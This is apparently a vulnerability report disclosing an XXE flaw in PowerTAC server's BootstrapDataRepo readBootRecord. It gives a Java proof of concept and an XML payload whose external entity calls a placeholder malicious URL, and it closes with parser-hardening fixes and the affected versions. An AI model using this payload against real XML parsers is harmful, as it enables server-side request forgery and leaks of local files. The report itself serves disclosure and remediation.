Potential XXE(XML External Entity Injection) under BootstrapDataRepo.java readBootRecord function

[JAckLosingHeart]

Hi team,

Description:
A XXE vulnerability might be exploited when reading Bootstrap data from XML files:

Since the DocumentBuilderFactory instance here does not enable security settings or disable external entities loading, which leads to potential XXE exploitation if the URL or the file behind URL is under control of the malicious guys, leading to SSRF, information leak and so on

POC:

import org.powertac.common.repo.BootstrapDataRepo;

import java.net.MalformedURLException;
import java.net.URL;

public class PowertacPoC {
    public static void main(String[] args) throws MalformedURLException {
        BootstrapDataRepo bootstrapDataRepo = new BootstrapDataRepo();
        URL maliciousXMLURL = new URL("file:poc.xml");
        bootstrapDataRepo.readBootRecord(maliciousXMLURL);
    }
}

poc.xml:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://replace.with.malicious.website">]>
<root>&xxe;</root>

And I can see the request in from the other side(malicious website)

Recommendation:
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or

factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Affected Component:
https://mvnrepository.com/artifact/org.powertac/server-interface <= 1.9.0
https://github.com/powertac/powertac-server <= powertac-server-1.9.0